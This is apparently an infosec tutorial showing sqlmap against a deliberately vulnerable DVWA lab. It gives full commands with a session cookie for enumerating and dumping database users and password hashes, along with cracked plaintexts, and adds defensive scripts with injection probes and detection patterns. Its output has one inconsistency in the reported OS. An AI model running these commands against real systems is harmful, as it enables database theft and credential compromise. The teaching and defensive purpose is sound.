What is SQLmap?
SQLmap is a free, open-source tool used to detect and exploit SQL injection vulnerabilities. Its strongest feature is that it automates both detection and exploitation (database fingerprinting, access to the underlying file system, and command execution).
Readers can download the SQLmap source code from the official project site at SourceForge: http://sourceforge.net/projects/sqlmap/
Who are the authors of SQLmap?
Bernardo Damele Assumpcao Guimaraes (@inquisb), who can be reached at bernardo@sqlmap.org, and Miroslav Stampar (@stamparm), who can be reached at miroslav@sqlmap.org.
All SQLmap developers can be reached together at dev@sqlmap.org.
What is the command for executing SQLmap?
Change to the directory where sqlmap.py is located and run:
# python sqlmap.py -h
(The option list is long and differs somewhat between versions, so it is not reproduced here; download the latest version and run the command on your own machine.)
SQLmap's command-line options are grouped into target options, request options, optimization, injection, detection, techniques, fingerprinting, and enumeration.
How to Use SQLmap:
For the demonstration we set up two virtual machines:
1. The victim machine runs Windows XP with a web server hosting a deliberately vulnerable web application (DVWA).
2. The attacker machine runs Ubuntu 12.04 with SQLmap installed.
Objective: use SQLmap to obtain the following information:
1. Enumerate the MySQL user names and password hashes.
2. Enumerate all databases.
3. Enumerate the tables of a specified database.
4. Enumerate all user names and passwords in a specified table.
Before running SQLmap we capture the current session cookie so that the logged-in session is kept while testing; here we use the Firefox add-on "TamperData" to read it.
The current cookie is "security=high; PHPSESSID=57p5g7f32b3ffv8l45qppudqn3".
For ease of demonstration, we set the DVWA security level to low.
Next, open the "SQL Injection" page, enter any value, and submit it. The GET request carrying the id parameter looks like this:
http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
This page is therefore our target.
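The id parameter is injectable because the DVWA "low" page pastes the parameter straight into its SQL text. The following Python script is an added example, not part of the original article or of DVWA's own code: it recreates a users table in an in-memory SQLite database (the rows are constructed to mirror the column names the article's later dump shows) and contrasts the concatenated query with a parameterised one, which is the fix for this class of bug.

```python
import sqlite3

# Constructed sample rows with the same column names as the DVWA users table
# (user_id, user, password); the hash values are placeholders, not DVWA's data.
SAMPLE_USERS = [
    (1, "admin", "<hash-1>"),
    (2, "gordonb", "<hash-2>"),
    (3, "1337", "<hash-3>"),
    (4, "pablo", "<hash-4>"),
    (5, "smithy", "<hash-5>"),
]


def make_db():
    """Build an in-memory database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """String concatenation: the id value becomes part of the SQL statement,
    which is the pattern that lets a tool such as sqlmap rewrite the query."""
    sql = "SELECT user_id, user FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Parameter binding: the driver passes the value separately from the SQL
    text, so the value can never change the structure of the statement."""
    sql = "SELECT user_id, user FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def demo():
    """Run both lookups with a normal id and with a tautology probe."""
    conn = make_db()
    normal = "1"
    tautology = "1' OR '1'='1"   # classic probe that makes the WHERE clause always true
    return {
        "vulnerable_normal": lookup_vulnerable(conn, normal),
        "vulnerable_payload": lookup_vulnerable(conn, tautology),
        "safe_normal": lookup_safe(conn, normal),
        "safe_payload": lookup_safe(conn, tautology),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {len(rows)} row(s) -> {rows}")
```

The vulnerable lookup returns every row for the probe because the closing quote ends the intended literal; the parameterised lookup treats the whole string as one value, finds no matching id, and returns nothing. The same contrast holds for the real DVWA query, which uses exactly this quoted-concatenation pattern at its low security level.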
The following command retrieves the DBMS banner, the current database, and the current user:
python sqlmap.py -u "http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" -b --current-db --current-user
Usage options:
1. --cookie: set our cookie value; security=low switches the DVWA security level from high to low
2. -u: specify the target URL
3. -b: retrieve the DBMS banner
4. --current-db: retrieve the current database
5. --current-user: retrieve the current user
The result is as follows:
DBMS: MySQL version 5.0
OS version: Ubuntu 12.04
Current user: root
Current db: DVWA
The following command enumerates all DBMS users and their password hashes; the hashes can then be attacked offline to recover the passwords:
python sqlmap.py -u "http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" --string="Surname" --users --passwords
Usage options:
1. --string: a string to match in the page when the injected query evaluates to true
2. --users: enumerate DBMS users
3. --passwords: enumerate DBMS users' password hashes
The result is as follows:
database management system users [142]:
[*] ''@'kingasmk'
[*] ''@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'kingasmk'
[*] 'root'@'localhost'
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *C30441E06530498BC86019BF3211B94B3BAB295A
[*] phpmyadmin [1]:
    password hash: *C30441E06530498BC86019BF3211B94B3BAB295A
[*] root [4]:
    password hash: *C30441E06530498BC86019BF3211B94B3BAB295A
    password hash: *C30441E06530498BC86019BF3211B94B3BAB295A
    password hash: *C30441E06530498BC86019BF3211B94B3BAB295A
    password hash: *C30441E06530498BC86019BF3211B94B3BAB295A
Readers can use tools such as Cain & Abel and John the Ripper to recover the plaintext passwords from these hashes. The following command enumerates all databases on the server:
python sqlmap.py -u "http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" --dbs
Usage options:
--dbs: enumerate the databases on the DBMS
The result is as follows:
available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
Next we enumerate the tables of the dvwa database with the following command:
python sqlmap.py -u "http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" -D dvwa --tables
Usage options:
1. -D: the DBMS database to enumerate
2. --tables: enumerate the tables of the DBMS database
The result is as follows:
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+
The following command lists the columns of the users table:
python sqlmap.py -u "http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" -D dvwa -T users --columns
Usage options:
-T: the DBMS table to enumerate
--columns: enumerate all columns of the DBMS table
The result is as follows:
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+
The columns we are interested in are user and password, which hold the user name and the password. We now extract their contents. The following command dumps the user and password columns of the users table:
python sqlmap.py -u "http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" -D dvwa -T users -C user,password --dump
Usage options:
-T: the DBMS table to enumerate
-C: the columns of the DBMS table to enumerate
--dump: dump the entries of the DBMS table
SQLmap asks whether it should try to crack the password hashes; press Enter to confirm.
The user names and plaintext passwords are as follows:
Database: dvwa
Table: users
[5 entries]
+---------+---------+---------------------------------------------+
| user_id | user    | password                                    |
+---------+---------+---------------------------------------------+
| 1       | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| 2       | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| 3       | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| 4       | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| 5       | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------+---------------------------------------------+
With these credentials we can log in to the admin account and do anything we like.
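SQLmap recovers the plaintexts so quickly because the table stores unsalted MD5 digests: one dictionary lookup reproduces every hash directly, and two users with the same password (admin and smithy) end up with an identical hash. The following Python script is an added example, not part of the article: it re-checks the dumped rows against the plaintexts sqlmap reported and then shows the storage scheme that defeats this, a random per-user salt with a slow key-derivation function (PBKDF2-HMAC-SHA256 from the standard library; the iteration count is an assumption for the example).

```python
import hashlib
import hmac
import os
from collections import defaultdict

# Rows as dumped by sqlmap in the article: (user, stored hash).
DUMPED_ROWS = [
    ("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    ("gordonb", "e99a18c428cb38d5f260853678922e03"),
    ("1337", "8d3533d75ae2c3966d7e0d4fcc69216b"),
    ("pablo", "0d107d09f5bbe40cade3de5c71e9e9b7"),
    ("smithy", "5f4dcc3b5aa765d61d8327deb882cf99"),
]
# The plaintexts sqlmap printed next to the hashes.
REPORTED_PLAINTEXTS = ["password", "abc123", "charley", "letmein"]


def md5_hex(text):
    """Plain MD5 of a string, as the DVWA users table stores it."""
    return hashlib.md5(text.encode()).hexdigest()


def match_unsalted_md5(rows, candidates):
    """Map each user to the candidate whose plain MD5 equals the stored hash.

    With no salt, one hash computation per candidate covers every user at
    once, which is exactly why the dump is cracked in an instant.
    """
    lookup = {md5_hex(c): c for c in candidates}
    return {user: lookup.get(stored) for user, stored in rows}


def shared_hashes(rows):
    """Groups of users whose stored hashes are identical: a tell-tale sign of no salt."""
    by_hash = defaultdict(list)
    for user, stored in rows:
        by_hash[stored].append(user)
    return [users for users in by_hash.values() if len(users) > 1]


# Hardened storage: random per-user salt plus a deliberately slow KDF.
PBKDF2_ITERATIONS = 600_000   # assumption for the example; tune to your hardware budget


def hash_password(password, salt=None):
    """Return (salt, derived_key); a fresh random salt is drawn if none is given."""
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, key


def verify_password(password, salt, key):
    """Recompute the key and compare in constant time."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, key)


def salted_hashes_differ(password):
    """The same password stored twice yields two different records, both of which verify."""
    (s1, k1), (s2, k2) = hash_password(password), hash_password(password)
    return k1 != k2 and verify_password(password, s1, k1) and verify_password(password, s2, k2)


if __name__ == "__main__":
    print(match_unsalted_md5(DUMPED_ROWS, REPORTED_PLAINTEXTS))
    print("users sharing a hash:", shared_hashes(DUMPED_ROWS))
    print("salted records differ:", salted_hashes_differ("password"))
```

With the salted scheme, admin and smithy would no longer share a hash, a precomputed table of MD5 values is useless, and each guess costs the attacker hundreds of thousands of hash iterations instead of one.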
Summary:
SQLmap is a powerful tool that simplifies the work and automates both the detection and the exploitation of SQL injection.
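Every step of this walkthrough produces a burst of requests from one client against one URL, each with a differently mangled id value, and by default sqlmap names itself in the User-Agent header. The following Python script is an added example written from the defender's side, not part of the article: it parses constructed Apache combined-format access-log lines (the addresses, timestamps and user agents are made up for the example) and raises three kinds of alert: a tool User-Agent, SQL metacharacters in a query parameter, and an unusually high number of hits from one client on one path. The last sample line shows why the User-Agent check alone is not enough: sqlmap's --random-agent option replaces the default header, but the parameter check still fires.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Fragments that have no business in a numeric id parameter.
SQLI_MARKERS = re.compile(
    r"(['\"]|--|#|/\*|\bunion\b|\bselect\b|\bsleep\(|\bbenchmark\(|\b(?:and|or)\b\s+\d+\s*=\s*\d+)",
    re.IGNORECASE,
)

# Constructed sample: one normal browser visit followed by sqlmap-style probes
# against the article's target page. Addresses and agents are made up.
SAMPLE_LOG = """
10.10.10.9 - - [12/Mar/2013:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4521 "http://10.10.10.2/dvwa/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"
10.10.10.9 - - [12/Mar/2013:10:02:10 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 4533 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.10.10.9 - - [12/Mar/2013:10:02:10 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 4521 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.10.10.9 - - [12/Mar/2013:10:02:11 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%20AND%201%3D2&Submit=Submit HTTP/1.1" 200 4490 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.10.10.9 - - [12/Mar/2013:10:02:11 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20&Submit=Submit HTTP/1.1" 200 4600 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.10.10.9 - - [12/Mar/2013:10:02:12 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%20%271%27%3D%271&Submit=Submit HTTP/1.1" 200 4521 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 Chrome/24.0 Safari/537.36"
""".strip().splitlines()


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def flagged_params(target):
    """Decode the query string and return {param: value} for values carrying markers."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {k: v for k, values in params.items() for v in values if SQLI_MARKERS.search(v)}


def analyze(lines, burst_threshold=5):
    """Return a list of alert dicts for the given log lines."""
    alerts = []
    hits = Counter()   # requests per (client, path) in the slice of log examined
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = urlsplit(rec["target"]).path
        hits[(rec["ip"], path)] += 1
        if "sqlmap" in rec["ua"].lower():
            alerts.append({"kind": "tool_user_agent", "ip": rec["ip"], "ua": rec["ua"]})
        bad = flagged_params(rec["target"])
        if bad:
            alerts.append({"kind": "sqli_pattern", "ip": rec["ip"], "path": path, "params": bad})
    for (ip, path), n in hits.items():
        if n >= burst_threshold:
            alerts.append({"kind": "burst", "ip": ip, "path": path, "requests": n})
    return alerts


def alert_counts(lines, burst_threshold=5):
    """How many alerts of each kind the lines produce."""
    return dict(Counter(a["kind"] for a in analyze(lines, burst_threshold)))


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The marker list is deliberately short and tuned to a parameter that should only ever carry an integer; on a free-text field it would produce false positives, so in practice the pattern check is scoped per parameter. The burst count is a simple tally over the lines examined; a production rule would bound it by a time window.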
[Via infosecinstitute]